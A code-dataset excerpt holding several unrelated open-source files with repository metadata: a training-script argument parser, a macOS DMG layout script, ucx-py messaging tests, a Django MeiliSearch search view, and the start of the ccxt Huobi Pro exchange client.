                        help="margin of ranking loss")
    parser.add_argument("--hard_ratio",
                        default=0.3, type=float,
                        help="sampling ratio of hard negatives")
    parser.add_argument("--learning_rate",
                        default=3e-5,
                        type=float,
                        help="The initial learning rate for Adam.")
    parser.add_argument("--num_train_steps",
                        default=32000,
                        type=int,
                        help="Total number of training updates to perform.")
    parser.add_argument("--optim", default='adam',
                        choices=['adam', 'adamax', 'adamw'],
                        help="optimizer")
    parser.add_argument("--betas", default=[0.9, 0.98], nargs='+', type=float,
                        help="beta for adam optimizer")
    parser.add_argument("--decay", default='linear',
                        choices=['linear', 'invsqrt', 'constant'],
                        help="learning rate decay method")
    parser.add_argument("--dropout",
                        default=0.1,
                        type=float,
                        help="tune dropout regularization")
    parser.add_argument("--weight_decay",
                        default=0.0,
                        type=float,
                        help="weight decay (L2) regularization")
    parser.add_argument("--grad_norm",
                        default=0.25,
                        type=float,
                        help="gradient clipping (-1 for no clipping)")
    parser.add_argument("--warmup_steps",
                        default=4000,
                        type=int,
                        help="Number of training steps to perform linear "
                             "learning rate warmup for. (invsqrt decay)")
    # device parameters
    parser.add_argument('--seed',
                        type=int,
                        default=24,
                        help="random seed for initialization")
    parser.add_argument('--fp16',
                        action='store_true',
                        help="Whether to use 16-bit float precision instead "
                             "of 32-bit")
    parser.add_argument('--n_workers', type=int, default=4,
                        help="number of data workers")
    parser.add_argument('--pin_mem', action='store_true',
                        help="pin memory")
    # can use config files
    parser.add_argument('--config', help='JSON config files')
    args = parse_with_config(parser)
    # refuse to clobber an existing, non-empty output directory
    if exists(args.output_dir) and os.listdir(args.output_dir):
        raise ValueError("Output directory ({}) already exists and is not "
                         "empty.".format(args.output_dir))
    # NOTE(review): with conf_th == -1 a *fixed* num_bb is used (see
    # create_dataloader), so one would expect num_bb to be bounded in that
    # branch and max_bb in the other; these asserts look swapped -- confirm
    # against DetectFeatLmdb before changing.
    if args.conf_th == -1:
        assert args.max_bb + args.max_txt_len + 2 <= 512
    else:
        assert args.num_bb + args.max_txt_len + 2 <= 512
    # options safe guard
    main(args)
| 40.218341 | 79 | 0.562486 |
a4f469b6e432881fa2bd58668f0c11f0406d4ef9 | 3,706 | py | Python | contrib/macdeploy/custom_dsstore.py | VeriConomy/Verium | c3534ab37a173328a152c1e5c13df83e458d3c24 | [
"MIT"
] | null | null | null | contrib/macdeploy/custom_dsstore.py | VeriConomy/Verium | c3534ab37a173328a152c1e5c13df83e458d3c24 | [
"MIT"
] | null | null | null | contrib/macdeploy/custom_dsstore.py | VeriConomy/Verium | c3534ab37a173328a152c1e5c13df83e458d3c24 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2013-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import biplist
from ds_store import DSStore
from mac_alias import Alias
import sys

# CLI: custom_dsstore.py <output .DS_Store path> <volume/package name>
output_file = sys.argv[1]
package_name_ns = sys.argv[2]

ds = DSStore.open(output_file, 'w+')
# 'bwsp' = Finder browser window settings for the DMG root folder
# (window geometry, and hide every chrome element except the path bar).
ds['.']['bwsp'] = {
    'ShowStatusBar': False,
    'WindowBounds': '{{300, 280}, {500, 343}}',
    'ContainerShowSidebar': False,
    'SidebarWidth': 0,
    'ShowTabView': False,
    'PreviewPaneVisibility': False,
    'ShowToolbar': False,
    'ShowSidebar': False,
    'ShowPathbar': True
}
icvp = {
'gridOffsetX': 0.0,
'textSize': 12.0,
'viewOptionsVersion': 1,
'backgroundImageAlias': b'\x00\x00\x00\x00\x02\x1e\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd1\x94\\\xb0H+\x00\x05\x00\x00\x00\x98\x0fbackground.tiff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\xd19\xb0\xf8\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\r\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b.background\x00\x00\x10\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x11\x00\x08\x00\x00\xd19\xb0\xf8\x00\x00\x00\x01\x00\x04\x00\x00\x00\x98\x00\x0e\x00 \x00\x0f\x00b\x00a\x00c\x00k\x00g\x00r\x00o\x00u\x00n\x00d\x00.\x00t\x00i\x00f\x00f\x00\x0f\x00\x02\x00\x00\x00\x12\x00\x1c/.background/background.tiff\x00\x14\x01\x06\x00\x00\x00\x00\x01\x06\x00\x02\x00\x00\x0cMacintosh HD\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x97\xab\xc3H+\x00\x00\x01\x88[\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02u\xab\x8d\xd1\x94\\\xb0devrddsk\xff\xff\xff\xff\x00\x00\t \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07verium\x00\x00\x00\x10\x00\x08\x00\x00\xce\x97\xab\xc3\x00\x00\x00\x11\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x01\x00\x14\x01\x88[\x88\x00\x16\xa9\t\x00\x08\xfaR\x00\x08\xfaQ\x00\x02d\x8e\x00\x0e\x00\x02\x00\x00\x00\x0f\x00\x1a\x00\x0c\x00M\x00a\x00c\x00i\x00n\x00t\x00o\x00s\x00h\x00 \x00H\x00D\x00\x13\x00\x01/\x00\x00\x15\x00\x02\x00\x14\xff\xff\x00\x00\xff\xff\x00\x00',
'backgroundColorBlue': 1.0,
'iconSize': 96.0,
'backgroundColorGreen': 1.0,
'arrangeBy': 'none',
'showIconPreview': True,
'gridSpacing': 100.0,
'gridOffsetY': 0.0,
'showItemInfo': False,
'labelOnBottom': True,
'backgroundType': 2,
'backgroundColorRed': 1.0
}
# Rewrite the template background-image alias so it points at this
# package's volume and temp DMG instead of the original build machine's.
alias = Alias.from_bytes(icvp['backgroundImageAlias'])
alias.volume.name = package_name_ns
alias.volume.posix_path = '/Volumes/' + package_name_ns
alias.volume.disk_image_alias.target.filename = package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.carbon_path = 'Macintosh HD:Users:\x00veriumuser:\x00Documents:\x00verium:\x00verium:\x00' + package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.posix_path = 'Users/veriumuser/Documents/verium/verium/' + package_name_ns + '.temp.dmg'
alias.target.carbon_path = package_name_ns + ':.background:\x00background.tiff'
icvp['backgroundImageAlias'] = biplist.Data(alias.to_bytes())
# 'icvp' = icon view settings; 'vSrn' marks the store as dirty for Finder.
ds['.']['icvp'] = icvp
ds['.']['vSrn'] = ('long', 1)
# Icon positions inside the DMG window.
ds['Applications']['Iloc'] = (370, 156)
ds['Verium-Qt.app']['Iloc'] = (128, 156)
ds.flush()
ds.close()
| 61.766667 | 1,820 | 0.723691 |
a4464a943ed2deb0b600e940a1d286456d4da3aa | 5,837 | py | Python | tests/test_send_recv.py | pentschev/ucx-py | d701a3facd85ef2deece619a4f707fdebee36e3c | [
"BSD-3-Clause"
] | 76 | 2019-06-08T04:03:39.000Z | 2022-01-07T20:34:23.000Z | tests/test_send_recv.py | rapidsai/ucx-py | e28d770aa0b47c0e63c2e7e61649f1b355560e8a | [
"BSD-3-Clause"
] | 644 | 2019-06-04T23:06:02.000Z | 2022-02-24T11:17:45.000Z | tests/test_send_recv.py | pentschev/ucx-py | d701a3facd85ef2deece619a4f707fdebee36e3c | [
"BSD-3-Clause"
] | 32 | 2019-08-14T09:22:02.000Z | 2022-01-21T20:17:50.000Z | import functools
import pytest
import ucp

np = pytest.importorskip("numpy")  # skip the whole module if numpy is absent
# Message sizes under test: 1 B up to 16 MiB in factor-16 steps.
msg_sizes = [2 ** i for i in range(0, 25, 4)]
# Numpy dtype strings exercised by the parametrized round-trip tests.
dtypes = ["|u1", "<i8", "f8"]
def make_echo_server(create_empty_data):
    """
    Build an echo-server coroutine whose receive buffer is allocated by
    ``create_empty_data(nbytes)``.
    """
    async def echo_server(ep):
        """
        Sized-message echo handler.  The peer is expected to:
        1. send the payload size in bytes (uint64),
        2. send the payload itself,
        3. receive the echoed payload back.
        """
        size_buf = np.empty(1, dtype=np.uint64)
        await ep.recv(size_buf)
        payload = create_empty_data(size_buf[0])
        await ep.recv(payload)
        await ep.send(payload)
        await ep.close()

    return echo_server
@pytest.mark.asyncio
@pytest.mark.parametrize("size", msg_sizes)
@pytest.mark.parametrize("blocking_progress_mode", [True, False])
async def test_send_recv_bytes(size, blocking_progress_mode):
    """Round-trip a bytearray of `size` bytes through the echo server."""
    ucp.init(blocking_progress_mode=blocking_progress_mode)
    msg = bytearray(b"m" * size)
    msg_size = np.array([len(msg)], dtype=np.uint64)
    listener = ucp.create_listener(make_echo_server(lambda n: bytearray(n)))
    client = await ucp.create_endpoint(ucp.get_address(), listener.port)
    # protocol: announce size, send payload, receive echo
    await client.send(msg_size)
    await client.send(msg)
    resp = bytearray(size)
    await client.recv(resp)
    assert resp == msg
@pytest.mark.asyncio
@pytest.mark.parametrize("size", msg_sizes)
@pytest.mark.parametrize("dtype", dtypes)
@pytest.mark.parametrize("blocking_progress_mode", [True, False])
async def test_send_recv_numpy(size, dtype, blocking_progress_mode):
    """Round-trip a numpy array (host memory) through the echo server."""
    ucp.init(blocking_progress_mode=blocking_progress_mode)
    msg = np.arange(size, dtype=dtype)
    msg_size = np.array([msg.nbytes], dtype=np.uint64)
    # the server echoes raw bytes, so its buffer is uint8-typed
    listener = ucp.create_listener(
        make_echo_server(lambda n: np.empty(n, dtype=np.uint8))
    )
    client = await ucp.create_endpoint(ucp.get_address(), listener.port)
    await client.send(msg_size)
    await client.send(msg)
    resp = np.empty_like(msg)
    await client.recv(resp)
    np.testing.assert_array_equal(resp, msg)
@pytest.mark.asyncio
@pytest.mark.parametrize("size", msg_sizes)
@pytest.mark.parametrize("dtype", dtypes)
@pytest.mark.parametrize("blocking_progress_mode", [True, False])
async def test_send_recv_cupy(size, dtype, blocking_progress_mode):
    """Round-trip a cupy array (GPU memory) through the echo server."""
    ucp.init(blocking_progress_mode=blocking_progress_mode)
    cupy = pytest.importorskip("cupy")  # GPU-only test
    msg = cupy.arange(size, dtype=dtype)
    msg_size = np.array([msg.nbytes], dtype=np.uint64)
    listener = ucp.create_listener(
        make_echo_server(lambda n: cupy.empty((n,), dtype=np.uint8))
    )
    client = await ucp.create_endpoint(ucp.get_address(), listener.port)
    await client.send(msg_size)
    await client.send(msg)
    resp = cupy.empty_like(msg)
    await client.recv(resp)
    # compare on the host
    np.testing.assert_array_equal(cupy.asnumpy(resp), cupy.asnumpy(msg))
@pytest.mark.asyncio
@pytest.mark.parametrize("size", msg_sizes)
@pytest.mark.parametrize("dtype", dtypes)
@pytest.mark.parametrize("blocking_progress_mode", [True, False])
async def test_send_recv_numba(size, dtype, blocking_progress_mode):
    """Round-trip a numba device array (GPU memory) through the echo server."""
    ucp.init(blocking_progress_mode=blocking_progress_mode)
    cuda = pytest.importorskip("numba.cuda")  # GPU-only test
    ary = np.arange(size, dtype=dtype)
    msg = cuda.to_device(ary)
    msg_size = np.array([msg.nbytes], dtype=np.uint64)
    listener = ucp.create_listener(
        make_echo_server(lambda n: cuda.device_array((n,), dtype=np.uint8))
    )
    client = await ucp.create_endpoint(ucp.get_address(), listener.port)
    await client.send(msg_size)
    await client.send(msg)
    resp = cuda.device_array_like(msg)
    await client.recv(resp)
    # compare on the host
    np.testing.assert_array_equal(np.array(resp), np.array(msg))
@pytest.mark.asyncio
@pytest.mark.parametrize("blocking_progress_mode", [True, False])
async def test_send_recv_error(blocking_progress_mode):
    """Receiving into a buffer larger than the message raises UCXMsgTruncated."""
    ucp.init(blocking_progress_mode=blocking_progress_mode)

    async def say_hey_server(ep):
        # server sends only 3 bytes
        await ep.send(bytearray(b"Hey"))
        await ep.close()

    listener = ucp.create_listener(say_hey_server)
    client = await ucp.create_endpoint(ucp.get_address(), listener.port)
    # client expects 100 bytes -> length mismatch
    msg = bytearray(100)
    with pytest.raises(
        ucp.exceptions.UCXMsgTruncated,
        match=r"length mismatch: 3 \(got\) != 100 \(expected\)",
    ):
        await client.recv(msg)
@pytest.mark.asyncio
@pytest.mark.parametrize("blocking_progress_mode", [True, False])
async def test_send_recv_obj(blocking_progress_mode):
    """Round-trip an object via the self-sizing send_obj/recv_obj API."""
    ucp.init(blocking_progress_mode=blocking_progress_mode)

    async def echo_obj_server(ep):
        obj = await ep.recv_obj()
        await ep.send_obj(obj)
        await ep.close()

    listener = ucp.create_listener(echo_obj_server)
    client = await ucp.create_endpoint(ucp.get_address(), listener.port)
    msg = bytearray(b"hello")
    await client.send_obj(msg)
    got = await client.recv_obj()
    assert msg == got
@pytest.mark.asyncio
@pytest.mark.parametrize("blocking_progress_mode", [True, False])
async def test_send_recv_obj_numpy(blocking_progress_mode):
    """Round-trip an object using a custom numpy allocator on both sides."""
    ucp.init(blocking_progress_mode=blocking_progress_mode)
    # recv_obj allocates its buffer via this callable
    allocator = functools.partial(np.empty, dtype=np.uint8)

    async def echo_obj_server(ep):
        obj = await ep.recv_obj(allocator=allocator)
        await ep.send_obj(obj)
        await ep.close()

    listener = ucp.create_listener(echo_obj_server)
    client = await ucp.create_endpoint(ucp.get_address(), listener.port)
    msg = bytearray(b"hello")
    await client.send_obj(msg)
    got = await client.recv_obj(allocator=allocator)
    assert msg == got
| 32.608939 | 78 | 0.708583 |
965947a822d570e99792770294ad15d48fdadf3f | 3,570 | py | Python | zoo/globalsearch/views.py | aexvir/the-zoo | 7816afb9a0a26c6058b030b4a987c73e952d92bd | [
"MIT"
] | 90 | 2018-11-20T10:58:24.000Z | 2022-02-19T16:12:46.000Z | zoo/globalsearch/views.py | kiwicom/the-zoo | fee0108ea7b65112e5b572a146cff4b1c54033fd | [
"MIT"
] | 348 | 2018-11-21T09:22:31.000Z | 2021-11-03T13:45:08.000Z | zoo/globalsearch/views.py | aexvir/the-zoo | 7816afb9a0a26c6058b030b4a987c73e952d92bd | [
"MIT"
] | 11 | 2018-12-08T18:42:07.000Z | 2021-02-21T06:27:58.000Z | from math import ceil
import structlog
from django.apps import apps
from django.views.generic import TemplateView
from .meili_client import meili_client
log = structlog.get_logger()
class GlobalSearchView(TemplateView):
    """Render global search results backed by the MeiliSearch indexes."""

    template_name = "search_overview.html"
    context_object_name = "context"
    # number of hits requested from MeiliSearch per page
    meili_limit = 20

    @staticmethod
    def _objects_from_result(search_results, index, result_objects=None):
        """Resolve raw MeiliSearch hits into Django model instances.

        Hits are grouped under the lower-cased index name in
        ``result_objects`` (created if ``None``).  When the index does not
        map to an installed model, the raw hit ids are stored instead.
        Returns the (mutated) ``result_objects`` dict.
        """
        if result_objects is None:
            # bug fix: the old code crashed on ``None.keys()`` when the
            # default was actually used
            result_objects = {}
        key = index["name"].lower()
        try:
            model = apps.get_model(index["uid"], index["name"])
            for result in search_results:
                # setdefault avoids a KeyError on the first hit of an index
                result_objects.setdefault(key, []).append(
                    model.objects.get(pk=result["id"])
                )
        except LookupError:
            # no matching installed model -- fall back to the raw ids.
            # bug fix: this branch previously appended to a key that was
            # never initialized, raising KeyError on the first hit.
            for result in search_results:
                result_objects.setdefault(key, []).append(result["id"])
        return result_objects

    def _search(self, search_query, index_type, offset=0, limit=meili_limit):
        """Query every MeiliSearch index and collect resolved objects.

        Returns ``(objects, offset, total_hits)`` where ``offset`` and
        ``total_hits`` refer to the index whose uid equals ``index_type``;
        per-index hit counts are stored under ``total_<name>`` keys.
        """
        objects_to_return = {}
        new_offset, total_hits = 0, 0
        for index in meili_client.get_indexes():
            results = meili_client.get_index(index["uid"]).search(
                query=search_query, opt_params={"offset": offset, "limit": limit}
            )
            objects_to_return[f"total_{index['name'].lower()}"] = results["nbHits"]
            if index_type == index["uid"]:
                # pagination data is only reported for the active index type
                new_offset = results["offset"]
                total_hits = results["nbHits"]
            objects_to_return = self._objects_from_result(
                results["hits"], index, objects_to_return
            )
        return objects_to_return, new_offset, total_hits

    def convert_meili_to_pages(self, total_hits, offset, limit=meili_limit):
        """Translate a MeiliSearch offset/limit pair into page numbers."""
        if total_hits < limit:
            # everything fits on a single page
            return {
                "total_pages": 1,
                "current_page": 1,
                "next_page": None,
                "previous_page": None,
            }
        total_pages = ceil(total_hits / limit)
        current_page = ceil((offset + limit) / limit)
        next_page = None if total_pages == current_page else current_page + 1
        # bug fix: previous_page must be None on the *first* page; the old
        # check (``next_page == 1``) could never be true (next_page is None
        # or >= 2) and yielded a bogus page 0 link.
        previous_page = None if current_page == 1 else current_page - 1
        return {
            "total_pages": total_pages,
            "current_page": current_page,
            "next_page": next_page,
            "previous_page": previous_page,
        }

    def convert_page_to_offset(self, page, limit=meili_limit):
        """Return the offset of the first hit of a 1-based ``page``."""
        return int((page * limit) - limit)

    def get_context_data(self, **kwargs):
        """Build the template context from the ``q``/``t``/``page`` params."""
        context_data = super().get_context_data(**kwargs)
        if "q" in self.request.GET:
            results, offset, total_hits = self._search(
                search_query=self.request.GET["q"],
                index_type=self.request.GET.get("t", "services"),
                offset=self.convert_page_to_offset(
                    int(self.request.GET.get("page", 1))
                ),
            )
            context_data.update(results)
            context_data["search_query"] = self.request.GET["q"]
            context_data["search_type"] = self.request.GET.get("t", "services")
            context_data["pagination"] = self.convert_meili_to_pages(total_hits, offset)
        # static navigation entries rendered for each project card
        context_data["project_links"] = [
            "Support",
            "Repository",
            "Dashboard",
            "Alerts",
            "Documentation",
        ]
        return context_data
| 36.060606 | 88 | 0.585994 |
412cc350f91926b11214a936caeba1d04eff9918 | 61,023 | py | Python | python/ccxt/huobipro.py | Cyril45/ccxt | 4bd1fd9d35cd54cd71cb546288ab43d0e1586218 | [
"MIT"
] | null | null | null | python/ccxt/huobipro.py | Cyril45/ccxt | 4bd1fd9d35cd54cd71cb546288ab43d0e1586218 | [
"MIT"
] | null | null | null | python/ccxt/huobipro.py | Cyril45/ccxt | 4bd1fd9d35cd54cd71cb546288ab43d0e1586218 | [
"MIT"
] | 1 | 2021-05-14T22:47:10.000Z | 2021-05-14T22:47:10.000Z | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import hashlib
import math
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import NetworkError
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import OnMaintenance
from ccxt.base.errors import RequestTimeout
from ccxt.base.decimal_to_precision import TRUNCATE
class huobipro(Exchange):
    def describe(self):
        """Return the static exchange metadata for Huobi Pro: identity,
        capability flags, timeframes, URLs, REST endpoint tables, fees,
        error-code mappings and per-exchange options, deep-merged over the
        base Exchange description."""
        return self.deep_extend(super(huobipro, self).describe(), {
            'id': 'huobipro',
            'name': 'Huobi Pro',
            'countries': ['CN'],
            'rateLimit': 2000,
            'userAgent': self.userAgents['chrome39'],
            'version': 'v1',
            'accounts': None,
            'accountsById': None,
            'hostname': 'api.huobi.pro',  # api.testnet.huobi.pro
            'pro': True,
            'has': {
                'cancelOrder': True,
                'CORS': False,
                'createOrder': True,
                'fetchBalance': True,
                'fetchClosedOrders': True,
                'fetchCurrencies': True,
                'fetchDepositAddress': True,
                'fetchDeposits': True,
                'fetchMarkets': True,
                'fetchMyTrades': True,
                'fetchOHLCV': True,
                'fetchOpenOrders': True,
                'fetchOrder': True,
                'fetchOrderBook': True,
                'fetchOrders': True,
                'fetchTicker': True,
                'fetchTickers': True,
                'fetchTrades': True,
                'fetchTradingLimits': True,
                'fetchWithdrawals': True,
                'withdraw': True,
            },
            'timeframes': {
                '1m': '1min',
                '5m': '5min',
                '15m': '15min',
                '30m': '30min',
                '1h': '60min',
                '4h': '4hour',
                '1d': '1day',
                '1w': '1week',
                '1M': '1mon',
                '1y': '1year',
            },
            'urls': {
                'test': {
                    'market': 'https://api.testnet.huobi.pro',
                    'public': 'https://api.testnet.huobi.pro',
                    'private': 'https://api.testnet.huobi.pro',
                },
                'logo': 'https://user-images.githubusercontent.com/1294454/76137448-22748a80-604e-11ea-8069-6e389271911d.jpg',
                'api': {
                    'market': 'https://{hostname}',
                    'public': 'https://{hostname}',
                    'private': 'https://{hostname}',
                    'v2Public': 'https://{hostname}',
                    'v2Private': 'https://{hostname}',
                },
                'www': 'https://www.huobi.com',
                'referral': 'https://www.huobi.com/en-us/topic/invited/?invite_code=rwrd3',
                'doc': 'https://huobiapi.github.io/docs/spot/v1/cn/',
                'fees': 'https://www.huobi.com/about/fee/',
            },
            'api': {
                'v2Public': {
                    'get': [
                        'reference/currencies',
                    ],
                },
                'v2Private': {
                    'get': [
                        'account/ledger',
                        'account/withdraw/quota',
                        'account/withdraw/address',  # query withdrawal addresses(parent users only)
                        'account/deposit/address',
                        'reference/transact-fee-rate',
                        'account/asset-valuation',  # get account asset valuation
                        'point/account',  # point card balance query
                        'sub-user/user-list',  # get the list of sub-users
                        'sub-user/user-state',  # get the state of a specific sub-user
                        'sub-user/account-list',  # get the account list of a specific sub-user
                        'sub-user/deposit-address',  # sub-user deposit address query
                        'sub-user/query-deposit',  # sub-user deposit history query
                        'user/api-key',  # parent/sub-user API key information query
                    ],
                    'post': [
                        'point/transfer',  # point card transfer
                        'sub-user/management',  # freeze/unfreeze a sub-user
                        'sub-user/creation',  # sub-user creation
                        'sub-user/tradable-market',  # set sub-user trading permissions
                        'sub-user/transferability',  # set sub-user asset transfer-out permissions
                        'sub-user/api-key-generation',  # sub-user API key creation
                        'sub-user/api-key-modification',  # modify sub-user API key
                        'sub-user/api-key-deletion',  # delete sub-user API key
                    ],
                },
                'market': {
                    'get': [
                        'history/kline',  # get candlestick(kline) data
                        'detail/merged',  # get aggregated market data(ticker)
                        'depth',  # get market depth data
                        'trade',  # get trade detail data
                        'history/trade',  # fetch recent trade records in bulk
                        'detail',  # get market detail 24h volume data
                        'tickers',
                    ],
                },
                'public': {
                    'get': [
                        'common/symbols',  # query all trading pairs supported by the system
                        'common/currencys',  # query all currencies supported by the system
                        'common/timestamp',  # query the current system time
                        'common/exchange',  # order limits
                        'settings/currencys',  # ?language=en-US
                    ],
                },
                'private': {
                    'get': [
                        'account/accounts',  # query all accounts(account-ids) of the current user
                        'account/accounts/{id}/balance',  # query the balance of a given account
                        'account/accounts/{sub-uid}',
                        'account/history',
                        'cross-margin/loan-info',
                        'margin/loan-info',  # query margin loan interest rates and quota
                        'fee/fee-rate/get',
                        'order/openOrders',
                        'order/orders',
                        'order/orders/{id}',  # query details of an order
                        'order/orders/{id}/matchresults',  # query the match results of an order
                        'order/orders/getClientOrder',
                        'order/history',  # query current and historical orders
                        'order/matchresults',  # query current and historical trades
                        'dw/withdraw-virtual/addresses',  # query crypto withdrawal addresses(deprecated)
                        'query/deposit-withdraw',
                        'margin/loan-info',
                        'margin/loan-orders',  # margin loan orders
                        'margin/accounts/balance',  # margin account details
                        'cross-margin/loan-orders',  # query cross-margin loan orders
                        'cross-margin/accounts/balance',  # cross-margin account details
                        'points/actions',
                        'points/orders',
                        'subuser/aggregate-balance',
                        'stable-coin/exchange_rate',
                        'stable-coin/quote',
                    ],
                    'post': [
                        'account/transfer',  # asset transfer(generic endpoint for transfers between parent and sub-users)
                        'futures/transfer',
                        'order/batch-orders',
                        'order/orders/place',  # create and execute a new order in one step(recommended)
                        'order/orders/submitCancelClientOrder',
                        'order/orders/batchCancelOpenOrders',
                        'order/orders',  # create a new order request(create only, do not execute)
                        'order/orders/{id}/place',  # execute an order(only executes a previously created order)
                        'order/orders/{id}/submitcancel',  # request cancellation of an order
                        'order/orders/batchcancel',  # cancel orders in batch
                        'dw/balance/transfer',  # asset transfer
                        'dw/withdraw/api/create',  # request a crypto withdrawal
                        'dw/withdraw-virtual/create',  # request a crypto withdrawal
                        'dw/withdraw-virtual/{id}/place',  # confirm a crypto withdrawal request(deprecated)
                        'dw/withdraw-virtual/{id}/cancel',  # cancel a crypto withdrawal request
                        'dw/transfer-in/margin',  # transfer from spot account into margin account
                        'dw/transfer-out/margin',  # transfer out of margin account into spot account
                        'margin/orders',  # request a margin loan
                        'margin/orders/{id}/repay',  # repay a margin loan
                        'cross-margin/transfer-in',  # asset transfer
                        'cross-margin/transfer-out',  # asset transfer
                        'cross-margin/orders',  # request a cross-margin loan
                        'cross-margin/orders/{id}/repay',  # repay a cross-margin loan
                        'stable-coin/exchange',
                        'subuser/transfer',
                    ],
                },
            },
            'fees': {
                'trading': {
                    'tierBased': False,
                    'percentage': True,
                    'maker': 0.002,
                    'taker': 0.002,
                },
            },
            'exceptions': {
                'exact': {
                    # err-code
                    'bad-request': BadRequest,
                    'api-not-support-temp-addr': PermissionDenied,  # {"status":"error","err-code":"api-not-support-temp-addr","err-msg":"API withdrawal does not support temporary addresses","data":null}
                    'timeout': RequestTimeout,  # {"ts":1571653730865,"status":"error","err-code":"timeout","err-msg":"Request Timeout"}
                    'gateway-internal-error': ExchangeNotAvailable,  # {"status":"error","err-code":"gateway-internal-error","err-msg":"Failed to load data. Try again later.","data":null}
                    'account-frozen-balance-insufficient-error': InsufficientFunds,  # {"status":"error","err-code":"account-frozen-balance-insufficient-error","err-msg":"trade account balance is not enough, left: `0.0027`","data":null}
                    'invalid-amount': InvalidOrder,  # eg "Paramemter `amount` is invalid."
                    'order-limitorder-amount-min-error': InvalidOrder,  # limit order amount error, min: `0.001`
                    'order-limitorder-amount-max-error': InvalidOrder,  # market order amount error, max: `1000000`
                    'order-marketorder-amount-min-error': InvalidOrder,  # market order amount error, min: `0.01`
                    'order-limitorder-price-min-error': InvalidOrder,  # limit order price error
                    'order-limitorder-price-max-error': InvalidOrder,  # limit order price error
                    'order-orderstate-error': OrderNotFound,  # canceling an already canceled order
                    'order-queryorder-invalid': OrderNotFound,  # querying a non-existent order
                    'order-update-error': ExchangeNotAvailable,  # undocumented error
                    'api-signature-check-failed': AuthenticationError,
                    'api-signature-not-valid': AuthenticationError,  # {"status":"error","err-code":"api-signature-not-valid","err-msg":"Signature not valid: Incorrect Access key [Access key错误]","data":null}
                    'base-record-invalid': OrderNotFound,  # https://github.com/ccxt/ccxt/issues/5750
                    'base-symbol-trade-disabled': BadSymbol,  # {"status":"error","err-code":"base-symbol-trade-disabled","err-msg":"Trading is disabled for self symbol","data":null}
                    'base-symbol-error': BadSymbol,  # {"status":"error","err-code":"base-symbol-error","err-msg":"The symbol is invalid","data":null}
                    'system-maintenance': OnMaintenance,  # {"status": "error", "err-code": "system-maintenance", "err-msg": "System is in maintenance!", "data": null}
                    # err-msg
                    'invalid symbol': BadSymbol,  # {"ts":1568813334794,"status":"error","err-code":"invalid-parameter","err-msg":"invalid symbol"}
                    'symbol trade not open now': BadSymbol,  # {"ts":1576210479343,"status":"error","err-code":"invalid-parameter","err-msg":"symbol trade not open now"}
                },
            },
            'options': {
                # https://github.com/ccxt/ccxt/issues/5376
                'fetchOrdersByStatesMethod': 'private_get_order_orders',  # 'private_get_order_history' # https://github.com/ccxt/ccxt/pull/5392
                'fetchOpenOrdersMethod': 'fetch_open_orders_v1',  # 'fetch_open_orders_v2' # https://github.com/ccxt/ccxt/issues/5388
                'createMarketBuyOrderRequiresPrice': True,
                'fetchMarketsMethod': 'publicGetCommonSymbols',
                'fetchBalanceMethod': 'privateGetAccountAccountsIdBalance',
                'createOrderMethod': 'privatePostOrderOrdersPlace',
                'language': 'en-US',
            },
            'commonCurrencies': {
                # https://github.com/ccxt/ccxt/issues/6081
                # https://github.com/ccxt/ccxt/issues/3365
                # https://github.com/ccxt/ccxt/issues/2873
                'GET': 'Themis',  # conflict with GET(Guaranteed Entrance Token, GET Protocol)
                'HOT': 'Hydro Protocol',  # conflict with HOT(Holo) https://github.com/ccxt/ccxt/issues/4929
                # https://github.com/ccxt/ccxt/issues/7399
                # https://coinmarketcap.com/currencies/pnetwork/
                # https://coinmarketcap.com/currencies/penta/markets/
                # https://en.cryptonomist.ch/blog/eidoo/the-edo-to-pnt-upgrade-what-you-need-to-know-updated/
                'PNT': 'Penta',
            },
        })
def fetch_trading_limits(self, symbols=None, params={}):
# self method should not be called directly, use loadTradingLimits() instead
# by default it will try load withdrawal fees of all currencies(with separate requests)
# however if you define symbols = ['ETH/BTC', 'LTC/BTC'] in args it will only load those
self.load_markets()
if symbols is None:
symbols = self.symbols
result = {}
for i in range(0, len(symbols)):
symbol = symbols[i]
result[symbol] = self.fetch_trading_limits_by_id(self.market_id(symbol), params)
return result
def fetch_trading_limits_by_id(self, id, params={}):
request = {
'symbol': id,
}
response = self.publicGetCommonExchange(self.extend(request, params))
#
# {status: "ok",
# data: { symbol: "aidocbtc",
